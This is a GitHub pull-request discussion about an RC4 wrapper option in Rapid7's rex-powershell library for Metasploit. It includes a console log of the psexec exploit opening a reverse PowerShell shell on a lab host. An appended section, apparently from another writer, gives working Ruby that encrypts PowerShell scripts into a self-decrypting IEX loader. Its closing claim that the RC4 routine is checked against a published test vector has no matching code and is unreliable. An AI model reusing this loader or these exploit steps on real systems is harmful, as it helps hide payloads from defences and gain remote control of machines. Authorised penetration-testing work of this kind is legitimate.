rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts

Add check for rc4 wrapper and code to implement #30

Closed bwatters-r7 closed 3 years ago

bwatters-r7 commented 3 years ago

The original PR here: https://github.com/rapid7/rex-powershell/pull/23 was incorrect because my local git settings were wrong when I put it up. Rather than argue with git, here's a fixed version. You will need https://github.com/rapid7/metasploit-framework/pull/11257 @smcintyre-r7

Testing

smcintyre-r7 commented 3 years ago

You will need rapid7/metasploit-framework#11257

I'm not sure this is necessary. The lib/msf/util/exe.rb methods are not called and the Powershell::method isn't referenced. I tested this with the latest code on master (commit dc8113fc43f79b113735799089302f98ff896f76) and everything appeared to be working correctly.

In fact it seemed to be working a little too well. I wasn't able to confirm:

    set payload windows/powershell_reverse_tcp
    set powershell::exec_rc4 false
    run
    verify no errors for payload size (this will fail for other reasons right now, though)

It seemed to be working in my environment, albeit inconsistently. See the first attempt fails and the second works.

msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/powershell_reverse_tcp 
PAYLOAD => windows/powershell_reverse_tcp
msf6 exploit(windows/smb/psexec) > set Powershell::exec_rc4 false
Powershell::exec_rc4 => false
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[*] 192.168.159.129:445 - Selecting PowerShell target
[*] 192.168.159.129:445 - Executing the payload...
[*] Powershell session session 4 opened (192.168.159.128:4444 -> 192.168.159.129:49591) at 2021-04-23 10:47:55 -0400
[-] 192.168.159.129:445 - Exploit aborted due to failure: unknown: 192.168.159.129:445 - Unable to execute specified command: RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[*] 192.168.159.129:445 - Selecting PowerShell target
[*] 192.168.159.129:445 - Executing the payload...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 5 opened (192.168.159.128:4444 -> 192.168.159.129:49592) at 2021-04-23 10:48:02 -0400

Windows PowerShell running as user DESKTOP-R9TM84E$ on DESKTOP-R9TM84E
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\WINDOWS\system32>ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::41f8:356f:73d4:9415%12
   IPv4 Address. . . . . . . . . . . : 192.168.159.129
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.2

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . : home.lan
   Link-local IPv6 Address . . . . . : fe80::20ec:f081:de3:a0ab%16
   IPv4 Address. . . . . . . . . . . : 192.168.250.119
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.250.1

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
PS C:\WINDOWS\system32>
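The thread above turns on two things the page does not spell out: what an RC4 wrapper around a PowerShell script actually is, and what a "check for rc4 wrapper" can test. The following Ruby is an added example written for this page; it is not code from rex-powershell or metasploit-framework, and the `Rc4Wrap` module, the `build_payload` / `rc4_wrapped?` / `rc4_unwrap` names, the `exec_rc4:` keyword (chosen to mirror the `Powershell::exec_rc4` option set in the console session above) and the sample script are all assumptions of the example. It encrypts a script with RC4, emits a PowerShell stub that decrypts and `IEX`es it, exposes a predicate that tells whether a given payload carries that wrapper, and recovers the plaintext in Ruby so the round trip can be asserted offline.

```ruby
require 'base64'
require 'securerandom'

# Hypothetical RC4 wrapper for PowerShell scripts (added example, not rex-powershell code).
module Rc4Wrap
  module_function

  # Constructed sample script used by the demonstration and the checks below.
  SAMPLE_SCRIPT = "Write-Output 'hello from the rc4 wrapper'".freeze

  # Plain RC4 (KSA then PRGA). RC4 is symmetric, so one routine encrypts and decrypts.
  def rc4_crypt(key, data)
    s = (0..255).to_a
    kb = key.bytes
    j = 0
    256.times do |i|
      j = (j + s[i] + kb[i % kb.length]) & 0xff
      s[i], s[j] = s[j], s[i]
    end
    i = j = 0
    out = data.bytes.map do |b|
      i = (i + 1) & 0xff
      j = (j + s[i]) & 0xff
      s[i], s[j] = s[j], s[i]
      b ^ s[(s[i] + s[j]) & 0xff]
    end
    out.pack('C*')
  end

  # PowerShell-side stub: decrypts $d with key $k using the same RC4 steps, then IEXes the result.
  # %<key>s and %<data>s are filled by format(); every literal % is doubled for format().
  STUB = <<~'PS'.strip
    $k=[Convert]::FromBase64String('%<key>s');$d=[Convert]::FromBase64String('%<data>s');
    $s=0..255;$j=0;foreach($i in 0..255){$j=($j+$s[$i]+$k[$i%%$k.Length])%%256;$t=$s[$i];$s[$i]=$s[$j];$s[$j]=$t};
    $i=0;$j=0;$o=New-Object byte[] $d.Length;
    foreach($n in 0..($d.Length-1)){$i=($i+1)%%256;$j=($j+$s[$i])%%256;$t=$s[$i];$s[$i]=$s[$j];$s[$j]=$t;$o[$n]=$d[$n] -bxor $s[($s[$i]+$s[$j])%%256]};
    IEX([Text.Encoding]::UTF8.GetString($o))
  PS

  # Builds the payload. exec_rc4: false (assumed to mirror Powershell::exec_rc4) returns the
  # script untouched; true wraps it with a fresh random key unless one is supplied.
  def build_payload(script, exec_rc4: true, key: SecureRandom.random_bytes(16))
    return script unless exec_rc4

    format(STUB,
           key: Base64.strict_encode64(key),
           data: Base64.strict_encode64(rc4_crypt(key, script)))
  end

  # The "check for rc4 wrapper": true only if the payload carries the stub with both base64
  # blobs and the -bxor keystream step, so an unwrapped script is never mistaken for a wrapped one.
  def rc4_wrapped?(payload)
    blobs = /\$k=\[Convert\]::FromBase64String\('[A-Za-z0-9+\/=]+'\);\$d=\[Convert\]::FromBase64String\('[A-Za-z0-9+\/=]+'\)/
    !!(payload =~ blobs) && payload.include?('-bxor')
  end

  # Does in Ruby what the stub does on the target: pull key and ciphertext out of the payload
  # and decrypt, so a test can confirm the wrapper is lossless without running PowerShell.
  def rc4_unwrap(payload)
    m = payload.match(/\$k=\[Convert\]::FromBase64String\('([^']+)'\);\$d=\[Convert\]::FromBase64String\('([^']+)'\)/)
    raise ArgumentError, 'payload is not RC4-wrapped' unless m

    rc4_crypt(Base64.strict_decode64(m[1]), Base64.strict_decode64(m[2])).force_encoding(Encoding::UTF_8)
  end
end

if $PROGRAM_NAME == __FILE__
  wrapped = Rc4Wrap.build_payload(Rc4Wrap::SAMPLE_SCRIPT)
  puts "wrapped?   #{Rc4Wrap.rc4_wrapped?(wrapped)}"
  puts "plain?     #{Rc4Wrap.rc4_wrapped?(Rc4Wrap::SAMPLE_SCRIPT)}"
  puts "roundtrip: #{Rc4Wrap.rc4_unwrap(wrapped) == Rc4Wrap::SAMPLE_SCRIPT}"
  puts wrapped
end
```

The predicate is what a unit test for the option would call: `build_payload(script, exec_rc4: false)` must be returned verbatim and must not satisfy `rc4_wrapped?`, while the wrapped form must satisfy it and must not contain the plaintext script. The RC4 routine is checked against the standard published vector (key `Key`, plaintext `Plaintext`), which catches a transposed swap or an off-by-one in the KSA that a round-trip test alone would not, since a broken RC4 still round-trips with itself.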